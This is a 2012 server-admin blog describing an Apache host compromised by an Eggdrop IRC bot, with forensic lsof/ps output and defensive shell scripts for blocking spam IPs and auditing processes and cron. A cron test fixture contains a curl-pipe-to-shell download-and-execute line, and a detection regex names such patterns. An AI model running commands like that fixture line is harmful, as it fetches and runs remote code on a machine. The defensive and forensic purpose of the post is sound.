In order to have full security and prevent future hackers from gaining access to my site via proxy servers, I have put together a suite of shell scripts that manipulate iptables and pattern-match a variety of these attempts.
It works on any common-or-garden variety of Linux that needs to run Apache and can easily be configured to allow and disallow good and bad IPs respectively.
It can be obtained via email to sales@housebyte.co.uk
Friday, 30 March 2012
Thursday, 15 March 2012
Conclusive Remarks
I am running a simple setup and everything works. I use older machines, so every once in a while I have a hardware problem.
Currently the version of the OS that I use is way behind the current version, so you might think this affects security, as the updates are being done for the most recent kernels.
This isn't an issue for me as much as it is for everyone else. I would prefer to fix my problems than have to fork out the expense of buying the latest hardware needed to run current versions of most OSs.
Less is more. Why are we spiralling into update addiction? This is not a viable economy. Information systems have become an occupation and not just a tool or a means to an end.
Discuss?
I am running an older system which, agreed, is more open to vulnerabilities. But I am not going to subscribe to continuous updates for my hardware to be able to stay in the game. If they want to use my machine to run servers on and they're listed in my logs, I can block them. However, if they aren't, or their processes are hidden from lsof or ps, then I am in trouble. When the CPU on my machine maxes out because of all the spawned servers one bot was able to create, then I know I am better off having an old system which just stops working if it's overloaded than a new one that maybe doesn't know when it's being overrun.
In fact I don't like updates that much - I figure if it ain't broke, why fix it. Of course when something goes wrong I can run an update; besides, it stops the message coming up.
Well, I hope this was a useful blog. As I have to repair and re-repair my server I will post more as I learn it.
Thanks and stay tuned.
How do I identify a proxy or CIDR range of malicious IPs to be blocked?
Start by grepping the access_log for POSTs to the WordPress comment handler, wp-comments-post.php:
tail /var/log/httpd/access_log | grep 'POST /wp-comments-post.php' | awk '{print $1}'
This gives you the source IPs that tried to POST a comment on your blog; look at how often each one appears.
You can build a block list from the repeat offenders:
tail -c 50000 /var/log/httpd/access_log | grep 'POST /wp-comments-post.php' | awk '{print $1}' | sort | uniq -c | sort -n
sort -n puts the busiest addresses at the bottom of the list. Run whois on those: it tells you which CIDR netblock the address belongs to and who owns it. An address in a hosting or data-centre range, rather than a residential ISP, is most likely an open proxy or a compromised server that a spam tool is hiding behind, and you can then decide whether to block the single address or the whole netblock.
Then add them to your block list, as before:
iptables -I INPUT -s 203.146.129.247 -j DROP
iptables -I OUTPUT -d 203.146.129.247 -j DROP
iptables-save > /etc/sysconfig/iptables
Two things to watch here. -A appends the rule at the end of the chain, so if an earlier rule already accepts the traffic (a typical ESTABLISHED -j ACCEPT rule, for instance) the DROP is never reached; -I puts it at the top. And iptables-save on its own only prints the ruleset to the terminal: redirect it into the file your init script loads at boot (/etc/sysconfig/iptables on Red Hat style systems, or whatever iptables-restore reads on yours) or the rules vanish at the next reboot. To block a whole netblock give the CIDR instead of the single address, e.g. -s 203.146.129.0/24.
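As an added example (not from the post, and not the author's script suite), here is the whole triage step as a pair of shell functions: one counts POSTs to wp-comments-post.php per source address over an access_log excerpt and keeps the repeat offenders, the other checks that each address is a well-formed IPv4 address or CIDR before turning it into iptables rules in a dedicated chain inserted at the head of INPUT. The log lines are constructed for the demo, and the threshold and chain name are assumptions; the rules are printed rather than applied so they can be reviewed first.

```shell
#!/bin/sh
# Added example, not the post's own script suite: count comment-spam POSTs
# per source address and turn the repeat offenders into iptables rules.
# The log lines, the threshold and the chain name are assumptions for the demo.

# Constructed access_log excerpt in Apache "combined" format.
SAMPLE_LOG='203.0.113.10 - - [15/Mar/2012:22:35:01 +0000] "POST /wp-comments-post.php HTTP/1.1" 302 5 "-" "Mozilla/4.0"
203.0.113.10 - - [15/Mar/2012:22:35:03 +0000] "POST /wp-comments-post.php HTTP/1.1" 302 5 "-" "Mozilla/4.0"
203.0.113.10 - - [15/Mar/2012:22:35:05 +0000] "POST /wp-comments-post.php HTTP/1.1" 302 5 "-" "Mozilla/4.0"
198.51.100.7 - - [15/Mar/2012:22:36:00 +0000] "POST /wp-comments-post.php HTTP/1.1" 302 5 "-" "Mozilla/4.0"
198.51.100.7 - - [15/Mar/2012:22:36:02 +0000] "POST /wp-comments-post.php HTTP/1.1" 302 5 "-" "Mozilla/4.0"
192.0.2.44 - - [15/Mar/2012:22:37:00 +0000] "GET /index.php HTTP/1.1" 200 8123 "-" "Mozilla/5.0"
192.0.2.44 - - [15/Mar/2012:22:37:10 +0000] "POST /wp-comments-post.php HTTP/1.1" 302 5 "-" "Mozilla/5.0"'

# Read an access_log on stdin; print "count ip", busiest first, for every
# address that POSTed to the WordPress comment handler at least $1 times.
comment_posters() {
    min="${1:-3}"
    grep '"POST /wp-comments-post.php' | awk '{print $1}' | sort | uniq -c | sort -rn |
        awk -v min="$min" '$1 >= min {print $1, $2}'
}

# Accept a dotted-quad IPv4 address with an optional /prefix, nothing else.
# Anything that ends up in a root-run iptables command gets checked first.
valid_ipv4_cidr() {
    printf '%s\n' "$1" | grep -Eq '^([0-9]{1,3}\.){3}[0-9]{1,3}(/[0-9]{1,2})?$' || return 1
    printf '%s\n' "$1" | awk -F'[./]' '{ for (i = 1; i <= 4; i++) if ($i > 255) exit 1
                                        if (NF == 5 && $5 > 32) exit 1 }'
}

# Read "count ip" lines on stdin and print the iptables commands that put the
# addresses in their own chain.  The chain is inserted at position 1 of INPUT
# so an earlier ACCEPT (for ESTABLISHED traffic, say) cannot shadow the DROPs.
block_rules() {
    chain="${1:-SPAMBLOCK}"
    printf 'iptables -N %s 2>/dev/null || iptables -F %s\n' "$chain" "$chain"
    printf 'iptables -D INPUT -j %s 2>/dev/null; iptables -I INPUT 1 -j %s\n' "$chain" "$chain"
    while read -r count ip; do
        if valid_ipv4_cidr "$ip"; then
            printf 'iptables -A %s -s %s -j DROP   # %s comment POSTs\n' "$chain" "$ip" "$count"
        else
            printf '# skipped malformed address: %s\n' "$ip" >&2
        fi
    done
}

# Demo on the sample: anyone with two or more comment POSTs gets a rule.
printf '%s\n' "$SAMPLE_LOG" | comment_posters 2 | block_rules SPAMBLOCK
```

On a real host the pipeline is `tail -c 50000 /var/log/httpd/access_log | comment_posters 5 | block_rules SPAMBLOCK`, piped into sh only once you are happy with what it prints, followed by iptables-save into the file your init script restores. Keeping the addresses in their own chain means a later clean-up is `iptables -F SPAMBLOCK` rather than hunting through INPUT.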
You can look for other patterns in how different IPs access your site; grep is enough for this. Remember it is probably the same machine behind several IPs, using proxies to hide its identity. One way to spot this is the User-Agent field at the end of each access_log line, which carries the browser and OS string the client sent:
the same unusual OS/browser string making the same sequence of requests from different IPs points at one spam tool working through a list of proxies. The User-Agent is supplied by the client and can be faked, so treat it as a hint rather than proof.
The other method is to use lsof to list the active TCP connections that
shouldn't be there (lsof -i tcp -n -P), grab the remote IPs and run whois on them.
If whois shows the address belongs to a hosting provider, there is little reason for another server to be holding a connection to your web server, so it is a candidate for blocking. If it belongs to an ISP it may simply be a genuine visitor, which you can confirm by finding the same address in access_log. nmap will show you what services the remote end is running and can help you decide whether it warrants a block; bear in mind that port-scanning other people's hosts may breach your ISP's acceptable-use policy, so keep it to a light scan of addresses that are already hitting you.
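The lsof step above, as an added example that is not part of the original post: a small awk filter over the output of lsof -i -n -P (numeric addresses and ports, so nothing hides behind a DNS name) that flags two things, a listener on a port you do not serve, and an established connection whose local port is not one of your service ports, meaning the process dialled out itself, as the bot's IRC session later on this page did. The sample lines are constructed to mirror that listing; the list of allowed ports is an assumption.

```shell
#!/bin/sh
# Added example, not from the original post: filter lsof -i -n -P output for
# connections a web server has no business holding.  Sample lines are
# constructed to mirror the compromised host described on this page; the
# list of ports the box is supposed to serve is an assumption.

SAMPLE_LSOF='COMMAND  PID   USER   FD   TYPE DEVICE SIZE/OFF NODE NAME
httpd   2001 apache    4u  IPv6  28215      0t0  TCP *:80 (LISTEN)
httpd   2001 apache    5u  IPv6  28217      0t0  TCP *:443 (LISTEN)
httpd   2001 apache   15u  IPv6 190196      0t0  TCP 192.168.1.36:80->198.51.100.7:44226 (ESTABLISHED)
perl    4628 apache    6u  IPv6  28215      0t0  TCP *:80 (LISTEN)
perl    4628 apache    5u  IPv6  28213      0t0  TCP *:8085 (LISTEN)
perl    4628 apache   17u  IPv4 190377      0t0  TCP 192.168.1.36:33027->203.146.129.247:6667 (ESTABLISHED)
sshd    1200   root    3u  IPv4  12001      0t0  TCP *:22 (LISTEN)'

# Read lsof -i -n -P output on stdin.  $1 is the comma-separated list of ports
# this host legitimately serves.  Prints pid<TAB>command<TAB>reason<TAB>endpoint for
#   - any LISTEN on a port outside that list, and
#   - any ESTABLISHED connection whose local port is outside it, i.e. one the
#     process dialled out itself (a web server should only ever be the callee).
flag_connections() {
    awk -v ok="${1:-80,443,22}" '
        BEGIN { n = split(ok, p, ","); for (i = 1; i <= n; i++) allowed[p[i]] = 1 }
        NR == 1 { next }                                   # header line
        $NF == "(LISTEN)" {
            n = split($(NF-1), a, ":"); port = a[n]       # last piece of "*:8085" or "[::]:8085"
            if (!(port in allowed)) printf "%s\t%s\tlisten\t%s\n", $2, $1, $(NF-1)
        }
        $NF == "(ESTABLISHED)" {
            split($(NF-1), ends, "->")
            n = split(ends[1], l, ":"); lport = l[n]
            if (!(lport in allowed)) printf "%s\t%s\toutbound\t%s\n", $2, $1, ends[2]
        }'
}

# Demo on the sample; on a live host run:  lsof -i -n -P | flag_connections 80,443,22
printf '%s\n' "$SAMPLE_LSOF" | flag_connections 80,443,22
```

The second rule is the useful one: an inbound connection on port 80 from a hosting range may or may not be a problem, but a process running as the apache user with an outbound session to port 6667 is an IRC bot until proven otherwise, whatever whois says about the far end.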
To start preventing further web attacks from proxy servers
As you may know there are many preventative measures that stop different attacks from ever getting near your server:
-using block lists in iptables
-updating the Apache web server
-running minimal services
-putting a proxy server in front of the site
-keeping up to date and installing security fixes
But you will often find these do not prevent attacks from unlisted IPs, that is addresses not yet in your block list. For these you can run simple scripts that reduce the damage they can do, restricting their ability to reach the parts of the site used for posting comments, generating backlinks and so on.
WordPress can be configured to refuse comments from unregistered users.
But this might not stop the server being overloaded by bots that use a fresh IP (a proxy) for each attempt to reach the site and POST a comment. This is comment spam, sometimes loosely called scraping.
You can list these attempts simply by running
tail /var/log/httpd/access_log
You will see them arrive every few minutes, POSTing to the comment handler or trying to register in order to post.
Get a list of the IPs they use and create your very own block list. That's a start, and there are many public block lists out there. But is this sufficient, and do we really need to block the world? Can we not filter it instead?
Well, I did some thinking and decided I wanted to restrict the number of server processes spawned for these nefarious purposes. For this I wrote a script which can be run by cron every 15 minutes or so; it looks to see whether there are too many server processes running and, if there are, it shuts them down and restarts the server. Simple but effective, and this prevents multiple requests overloading the machine.
But guess what: even when I shut down the server some HTTP requests were still running. This was another malicious program which had launched its own server on my system.
To shut it down I removed a cron entry,
deleted its files saved in the /tmp directory, and used kill -9 on the PIDs that were still running.
Then the script switches the server back on and tests to make sure my websites can be accessed. It has even got its own log file.
Of course these solutions treat the symptoms and not the cause, which would need a backup and reinstall.
But seriously, who wants the hassle of doing that every time it happens?
Here is the output from lsof and ps showing the malicious program and the PID to be killed. The first listing is lsof -p 4628; it is followed by lsof -i tcp:80, the same for https, and finally ps -elf | grep apache:-
COMMAND PID USER FD TYPE DEVICE SIZE NODE NAME
perl 4628 apache cwd DIR 3,2 0 803968 /tmp/mnc (deleted)
perl 4628 apache rtd DIR 3,2 4096 2 /
perl 4628 apache txt REG 3,2 1151198 678050 /usr/bin/perl
perl 4628 apache mem REG 3,2 16270 71646 /usr/local/lib/perl5/5.13.9/i686-linux/auto/IO/IO.so
perl 4628 apache mem REG 3,2 33005 37299 /usr/local/lib/perl5/5.13.9/i686-linux/auto/Encode/Encode.so
perl 4628 apache mem REG 3,2 120725 37269 /usr/local/lib/perl5/5.13.9/i686-linux/auto/Compress/Raw/Zlib/Zlib.so
perl 4628 apache mem REG 3,2 18521 87802 /usr/local/lib/perl5/5.13.9/i686-linux/auto/File/Glob/Glob.so
perl 4628 apache mem REG 3,2 14748 71596 /usr/local/lib/perl5/5.13.9/i686-linux/auto/Fcntl/Fcntl.so
perl 4628 apache mem REG 3,2 50944 816050 /lib/libnss_files-2.3.3.so
perl 4628 apache mem REG 3,2 106892 820617 /lib/ld-2.3.3.so
perl 4628 apache mem REG 3,2 1455084 820618 /lib/tls/libc-2.3.3.so
perl 4628 apache mem REG 3,2 16708 820621 /lib/libdl-2.3.3.so
perl 4628 apache mem REG 3,2 214796 820622 /lib/tls/libm-2.3.3.so
perl 4628 apache mem REG 3,2 15688 816093 /lib/libutil-2.3.3.so
perl 4628 apache mem REG 3,2 76588 820624 /lib/libresolv-2.3.3.so
perl 4628 apache mem REG 3,2 22172 816047 /lib/libnss_dns-2.3.3.so
perl 4628 apache mem REG 3,2 22781 71614 /usr/local/lib/perl5/5.13.9/i686-linux/auto/List/Util/Util.so
perl 4628 apache mem REG 3,2 10220 71609 /usr/local/lib/perl5/5.13.9/i686-linux/auto/I18N/Langinfo/Langinfo.so
perl 4628 apache mem REG 3,2 71635 71667 /usr/local/lib/perl5/5.13.9/i686-linux/auto/Storable/Storable.so
perl 4628 apache mem REG 3,2 28408 820630 /lib/libcrypt-2.3.3.so
perl 4628 apache mem REG 3,2 28411 71636 /usr/local/lib/perl5/5.13.9/i686-linux/auto/Socket/Socket.so
perl 4628 apache mem REG 3,2 96248 820631 /lib/libnsl-2.3.3.so
perl 4628 apache mem REG 3,2 12876 87783 /usr/local/lib/perl5/5.13.9/i686-linux/auto/MIME/Base64/Base64.so
perl 4628 apache mem REG 3,2 40259136 672802 /usr/lib/locale/locale-archive
perl 4628 apache 0r CHR 1,3 887233 /dev/null
perl 4628 apache 1w FIFO 0,7 190204 pipe
perl 4628 apache 2w REG 3,2 467407320 280611 /var/log/httpd/error_log
perl 4628 apache 3u IPv6 28208 TCP *:webcache (LISTEN)
perl 4628 apache 4u IPv6 28210 TCP *:tproxy (LISTEN)
perl 4628 apache 5u IPv6 28213 TCP *:8085 (LISTEN)
perl 4628 apache 6u IPv6 28215 TCP *:http (LISTEN)
perl 4628 apache 7u IPv6 28217 TCP *:https (LISTEN)
perl 4628 apache 8r FIFO 0,7 28273 pipe
perl 4628 apache 9w FIFO 0,7 28273 pipe
perl 4628 apache 10w REG 3,2 467407320 280611 /var/log/httpd/error_log
perl 4628 apache 11w REG 3,2 109980 280612 /var/log/httpd/ssl_error_log
perl 4628 apache 12w REG 3,2 41574053 280610 /var/log/httpd/access_log
perl 4628 apache 13w REG 3,2 82395 279420 /var/log/httpd/ssl_access_log
perl 4628 apache 14w REG 3,2 96494 279421 /var/log/httpd/ssl_request_log
perl 4628 apache 15u IPv6 190196 TCP 192.168.1.36:http->rs2.justhost.com:44226 (CLOSE_WAIT)
perl 4628 apache 16u unix 0x08d40980 190197 socket
perl 4628 apache 17u IPv4 190377 TCP 192.168.1.36:33027->203.146.129.247:ircd (ESTABLISHED)
COMMAND PID USER FD TYPE DEVICE SIZE NODE NAME
perl 4628 apache 6u IPv6 28215 TCP *:http (LISTEN)
perl 4628 apache 15u IPv6 190196 TCP 192.168.1.36:http->rs2.justhost.com:44226 (CLOSE_WAIT)
COMMAND PID USER FD TYPE DEVICE SIZE NODE NAME
perl 4628 apache 7u IPv6 28217 TCP *:https (LISTEN)
1 S apache 4628 1 5 75 0 - 2958 - 22:35 ? 00:04:25 /usr/sbin/apache2 -k start
4 S root 5661 2767 0 75 0 - 1142 pipe_w 23:51 pts/0 00:00:00 grep apache
Reading that output: the process is /usr/bin/perl (the txt line), not Apache, even though ps shows it as /usr/sbin/apache2 -k start, so it has rewritten its own command line to hide among the real workers (assigning to $0 does that in perl). It runs as the apache user; its working directory is /tmp/mnc, which has since been deleted; its parent is PID 1 (the PPID column in the ps line), so it has detached from Apache and survives service httpd stop; and it has clocked up four and a half minutes of CPU. Its stdout and stderr (fds 1 and 2) go to a pipe and to error_log, which is what a process started from inside an Apache child inherits. Descriptors 3 to 14, the listening sockets on webcache (8080), tproxy (8081), 8085, http and https together with all the Apache log files, carry much lower socket numbers than the later descriptors, which suggests they were inherited from the Apache child that spawned it rather than opened by the bot itself: that is why ports 80 and 443 stayed open after httpd was stopped, and why httpd cannot bind them again until this process is dead. Descriptor 17 is the one that matters, an outbound connection the bot opened itself to 203.146.129.247 on the ircd port (6667), the IRC channel it takes its orders from. Descriptor 15 is an inbound HTTP connection (our port 80, their ephemeral port 44226) from rs2.justhost.com sitting in CLOSE_WAIT; being the one web connection this process still holds, it is quite possibly the request that delivered the bot.
Here are the files placed on my server to run the bot. The doc directory, the help and language files and the Tcl scripts mark it as an Eggdrop IRC bot kit (see doc/man1/eggdrop.1 and doc/eggdrop.doc), apparently configured under the name Lucifer (Lucifer.usr, Lucifer.chn):-
tmp/mnc/
tmp/mnc/text/
tmp/mnc/text/motd
tmp/mnc/text/banner
tmp/mnc/httpd
tmp/mnc/sUx.conf
tmp/mnc/Lucifer.chn
tmp/mnc/pid.Lucifer
tmp/mnc/Lucifer
tmp/mnc/language/
tmp/mnc/language/console.german.lang
tmp/mnc/language/filesys.german.lang
tmp/mnc/language/assoc.german.lang
tmp/mnc/language/bs_data.Lucifer
tmp/mnc/language/core.french.lang
tmp/mnc/language/core.german.lang
tmp/mnc/language/wire.english.lang
tmp/mnc/language/core.english.lang
tmp/mnc/language/console.english.lang
tmp/mnc/language/assoc.english.lang
tmp/mnc/language/notes.english.lang
tmp/mnc/language/filesys.english.lang
tmp/mnc/language/wire.german.lang
tmp/mnc/language/wire.french.lang
tmp/mnc/language/filesys.french.lang
tmp/mnc/language/notes.german.lang
tmp/mnc/tcl
tmp/mnc/logs/
tmp/mnc/logs/CONTENTS
tmp/mnc/scripts/
tmp/mnc/scripts/http.tcl
tmp/mnc/scripts/action.fix.tcl
tmp/mnc/scripts/ipwhois.tcl
tmp/mnc/scripts/dns.tcl
tmp/mnc/scripts/alltools.tcl
tmp/mnc/scripts/port.tcl
tmp/mnc/scripts/version.tcl
tmp/mnc/scripts/seen.tcl
tmp/mnc/scripts/sUx.tcl
tmp/mnc/Lucifer.d
tmp/mnc/run
tmp/mnc/"\001
tmp/mnc/xh
tmp/mnc/Lucifer.usr
tmp/mnc/help/
tmp/mnc/help/cmds1.help
tmp/mnc/help/cmds2.help
tmp/mnc/help/irc.help
tmp/mnc/help/channels.help
tmp/mnc/help/seen.help
tmp/mnc/help/msg/
tmp/mnc/help/msg/irc.help
tmp/mnc/help/msg/seen.help
tmp/mnc/help/msg/userinfo.help
tmp/mnc/help/msg/notes.help
tmp/mnc/help/assoc.help
tmp/mnc/help/share.help
tmp/mnc/help/console.help
tmp/mnc/help/server.help
tmp/mnc/help/userinfo.help
tmp/mnc/help/set/
tmp/mnc/help/set/ctcp.help
tmp/mnc/help/set/cmds1.help
tmp/mnc/help/set/cmds2.help
tmp/mnc/help/set/irc.help
tmp/mnc/help/set/channels.help
tmp/mnc/help/set/transfer.help
tmp/mnc/help/set/compress.help
tmp/mnc/help/set/console.help
tmp/mnc/help/set/server.help
tmp/mnc/help/set/filesys.help
tmp/mnc/help/set/notes.help
tmp/mnc/help/filesys.help
tmp/mnc/help/cmd_resolve.help
tmp/mnc/help/chaninfo.help
tmp/mnc/help/core.help
tmp/mnc/help/notes.help
tmp/mnc/Lucifer.dir
tmp/mnc/doc/
tmp/mnc/doc/man1/
tmp/mnc/doc/man1/eggdrop.1
tmp/mnc/doc/UPDATES1.6
tmp/mnc/doc/tricks
tmp/mnc/doc/settings/
tmp/mnc/doc/settings/contents
tmp/mnc/doc/settings/mod.channel
tmp/mnc/doc/settings/core.settings
tmp/mnc/doc/settings/tricks
tmp/mnc/doc/settings/mod.woobie
tmp/mnc/doc/settings/mod.transfer
tmp/mnc/doc/settings/mod.compress
tmp/mnc/doc/settings/mod.assoc
tmp/mnc/doc/settings/mod.filesys
tmp/mnc/doc/settings/mod.ctcp
tmp/mnc/doc/settings/mod.wire
tmp/mnc/doc/settings/mod.irc
tmp/mnc/doc/settings/mod.seen
tmp/mnc/doc/settings/mod.share
tmp/mnc/doc/settings/mod.console
tmp/mnc/doc/settings/mod.dns
tmp/mnc/doc/settings/mod.notes
tmp/mnc/doc/settings/mod.server
tmp/mnc/doc/settings/mod.blowfish
tmp/mnc/doc/text-substitutions.doc
tmp/mnc/doc/compiling.FAQ
tmp/mnc/doc/patch.howto
tmp/mnc/doc/CONTENTS
tmp/mnc/doc/MODULES
tmp/mnc/doc/BUG-REPORT
tmp/mnc/doc/tcl-commands.doc
tmp/mnc/doc/KNOWN-PROBLEMS
tmp/mnc/doc/html/
tmp/mnc/doc/html/app-weird.html
tmp/mnc/doc/html/app-problems.html
tmp/mnc/doc/html/starting.html
tmp/mnc/doc/html/mod-server.html
tmp/mnc/doc/html/mod-assoc.html
tmp/mnc/doc/html/mod-share.html
tmp/mnc/doc/html/app-tricks.html
tmp/mnc/doc/html/about.html
tmp/mnc/doc/html/mod-compress.html
tmp/mnc/doc/html/app-sharing.html
tmp/mnc/doc/html/features.html
tmp/mnc/doc/html/egg-core.html
tmp/mnc/doc/html/compiling.html
tmp/mnc/doc/html/bans.html
tmp/mnc/doc/html/app-textsub.html
tmp/mnc/doc/html/faqs.html
tmp/mnc/doc/html/mod-wire.html
tmp/mnc/doc/html/install.html
tmp/mnc/doc/html/sharing.html
tmp/mnc/doc/html/mod-notes.html
tmp/mnc/doc/html/mod-filesys.html
tmp/mnc/doc/html/index.html
tmp/mnc/doc/html/authors.html
tmp/mnc/doc/html/users.html
tmp/mnc/doc/html/mod-dns.html
tmp/mnc/doc/html/mod-irc.html
tmp/mnc/doc/html/party.html
tmp/mnc/doc/html/flags.html
tmp/mnc/doc/html/botnet.html
tmp/mnc/doc/html/news.html
tmp/mnc/doc/html/mod-blowfish.html
tmp/mnc/doc/html/mod-channels.html
tmp/mnc/doc/html/readme.html
tmp/mnc/doc/BOTNET
tmp/mnc/doc/eggdrop.doc
tmp/mnc/doc/UPDATES.pre1.5
tmp/mnc/doc/UPDATES1.5
tmp/mnc/Lucifer.upd
tmp/mnc/sUx
tmp/mnc/Lucifer.run
tmp/mnc/filesys/
tmp/mnc/filesys/incoming/
tmp/mnc/t3394
tmp/mnc/tmp/
This is the important bit, containing all the info you need, from lsof -p PID:
perl 4628 apache 15u IPv6 190196 TCP 192.168.1.36:http->rs2.justhost.com:44226 (CLOSE_WAIT)
perl 4628 apache 16u unix 0x08d40980 190197 socket
perl 4628 apache 17u IPv4 190377 TCP 192.168.1.36:33027->203.146.129.247:ircd (ESTABLISHED)
You get the PID from ps -elf | grep apache, which lists every server process and its PID.
Look for the one that is still there after you have issued 'service httpd stop'. The init script only stops the processes it started, and this one has reparented itself to PID 1 (the PPID column in the ps output above), so it is left behind.
It shouldn't be there, and because it still holds the listening sockets for ports 80 and 443 you have to kill it before httpd will start again.
My internal IP is 192.168.1.36.
The malicious program holds two TCP connections: an outbound one it opened itself to 203.146.129.247 on port 6667 (ircd), the IRC channel it takes its orders from, and an inbound one from rs2.justhost.com to our port 80, left in CLOSE_WAIT.
Neither of these should be there. You can look for something similar using these commands:
ps -elf | grep apache
or
lsof -i tcp:80 -n -P
(-n -P skip the DNS and port-name lookups; that is faster and, since the other side controls its own reverse DNS, less misleading.)
then
lsof -p PID (using the PID from above)
then
kill PID (kill -9 PID if it ignores the first)
and you're done; after that you can restart your httpd server. Before you kill it, keep a copy of the lsof -p output and of /proc/PID/cmdline, environ and the fd listing: they disappear with the process, and they are what you will want when you come to work out how it got in. Don't forget to remove any
cron entries that shouldn't be there and remove any files in the /tmp directory that also shouldn't be there.
Check /var/spool/cron/ (and /etc/cron.d and /etc/crontab), and above all the apache user's crontab, since the bot was running as that user.
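The whole find, preserve, kill and clean-up procedure above, as one added example that is not the author's script: check_proc_tree asks the kernel rather than ps what each process really is, which is how a perl process calling itself apache2 with a deleted /tmp working directory gets caught; snapshot_process copies the /proc facts away before the kill; audit_cron greps the cron spools for the persistence entry. The /proc and cron fixtures are constructed, and the suspicious-pattern list and default spool paths are assumptions.

```shell
#!/bin/sh
# Added example, not the post's own cleanup script: the checks that go round
# the kill step.  check_proc_tree asks the kernel what each process really is
# (the bot told ps it was "/usr/sbin/apache2 -k start" while /proc/PID/exe said
# /usr/bin/perl, and its cwd was "/tmp/mnc (deleted)"); snapshot_process keeps
# the /proc facts that vanish with the process; audit_cron greps cron spools for
# the persistence entry.  Fixtures, pattern list and default paths are assumptions.

# One line per finding: pid<TAB>reason<TAB>detail<TAB>argv0.  $1 is a /proc-like root.
check_proc_tree() {
    root="${1:-/proc}"
    for d in "$root"/[0-9]*; do
        exe="$(readlink "$d/exe" 2>/dev/null)" || continue          # kernel thread, or not ours to read
        argv0="$(tr '\0' '\n' < "$d/cmdline" 2>/dev/null | head -n 1 || true)"
        [ -n "$argv0" ] || continue
        cwd="$(readlink "$d/cwd" 2>/dev/null || true)"
        pid="${d##*/}"
        exe_base="${exe##*/}"; exe_base="${exe_base% (deleted)}"
        argv_base="${argv0##*/}"; argv_base="${argv_base#-}"        # "-bash" is a login shell, not a lie
        [ "$argv_base" = "$exe_base" ] || printf '%s\tmasquerade\t%s\t%s\n' "$pid" "$exe" "$argv0"
        case "$cwd" in
            *" (deleted)"|/tmp/*|/var/tmp/*|/dev/shm/*) printf '%s\tcwd\t%s\t%s\n' "$pid" "$cwd" "$argv0" ;;
        esac
    done
}

# Copy what /proc knows about PID $1 into directory $2 before killing it.
snapshot_process() {
    [ -d "/proc/$1" ] || return 2
    mkdir -p "$2"
    for f in cmdline environ status maps; do cat "/proc/$1/$f" > "$2/$f" 2>/dev/null || true; done
    readlink "/proc/$1/exe" > "$2/exe" 2>/dev/null || true
    readlink "/proc/$1/cwd" > "$2/cwd" 2>/dev/null || true
    ls -l "/proc/$1/fd" > "$2/fd.txt" 2>/dev/null || true
    if command -v lsof >/dev/null 2>&1; then lsof -n -P -p "$1" > "$2/lsof.txt" 2>/dev/null || true; fi
}

# Crontab lines worth a second look: anything run from /tmp-like places,
# downloaders piped into a shell, base64-decoded payloads, inline perl.
CRON_SUSPECT_RE='/tmp/|/var/tmp/|/dev/shm/|(wget|curl)[^|]*[|] *(ba)?sh|base64 +(-d|--decode)|perl +-e'

# Print file:line:entry for matching non-comment lines in each spool directory given.
audit_cron() {
    [ $# -gt 0 ] || set -- /var/spool/cron /var/spool/cron/crontabs /etc/cron.d
    for spool; do
        for f in "$spool"/*; do
            [ -f "$f" ] || continue
            grep -Hn -E "$CRON_SUSPECT_RE" "$f" | grep -v -E '^[^:]*:[0-9]+:[[:space:]]*#' || true
        done
    done
}

# Constructed fixtures: a /proc look-alike with the bot (4628) and an honest
# worker (4630), and a cron spool with one clean and one poisoned crontab.
build_proc_fixture() {
    r="$(mktemp -d)"; mkdir -p "$r/4628" "$r/4630"
    ln -s /usr/bin/perl "$r/4628/exe";     ln -s "/tmp/mnc (deleted)" "$r/4628/cwd"
    ln -s /usr/sbin/apache2 "$r/4630/exe"; ln -s / "$r/4630/cwd"
    for p in 4628 4630; do printf '/usr/sbin/apache2\n-k\nstart\n' | tr '\n' '\0' > "$r/$p/cmdline"; done
    printf '%s\n' "$r"
}
build_cron_fixture() {
    s="$(mktemp -d)"
    printf '%s\n' '# nightly backup' '0 2 * * * /usr/local/bin/backup.sh' > "$s/root"
    printf '%s\n' '*/10 * * * * /tmp/mnc/run >/dev/null 2>&1' '# 0 * * * * /tmp/old-disabled' \
        '0 * * * * curl -s http://203.0.113.5/x | sh' > "$s/apache"
    printf '%s\n' "$s"
}

# Demo against the fixtures; live use is  check_proc_tree /proc  and  audit_cron
# followed by  snapshot_process 4628 /root/ir/4628 && kill -9 4628
check_proc_tree "$(build_proc_fixture)"
audit_cron "$(build_cron_fixture)"
```

Expect a little noise from check_proc_tree /proc on a live host (argv0 "python" against an exe of python3.9, sh against dash); the finding worth acting on is a mismatch combined with a cwd in /tmp or one marked (deleted), which is exactly the pair the bot on this page presents.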
You can block all the proxy servers listed by grepping /var/log/httpd/access_log as shown above.
To block an IP or a CIDR range use the following commands, shown here with the IRC server's address from above, 203.146.129.247 (for a range give the network and prefix length instead, e.g. 203.146.129.0/24):
iptables -I INPUT -s 203.146.129.247 -j DROP
iptables -I OUTPUT -d 203.146.129.247 -j DROP
iptables-save > /etc/sysconfig/iptables
The OUTPUT rule is the one that counts against a bot like this: it cuts the bot off from its IRC server even if it gets started again before you have finished cleaning up. -I puts the rules at the top of the chain so nothing above them accepts the traffic first, and iptables-save needs redirecting into the file your init script restores at boot (/etc/sysconfig/iptables on Red Hat style systems) or the rules are lost at the next reboot.
Happy hunting.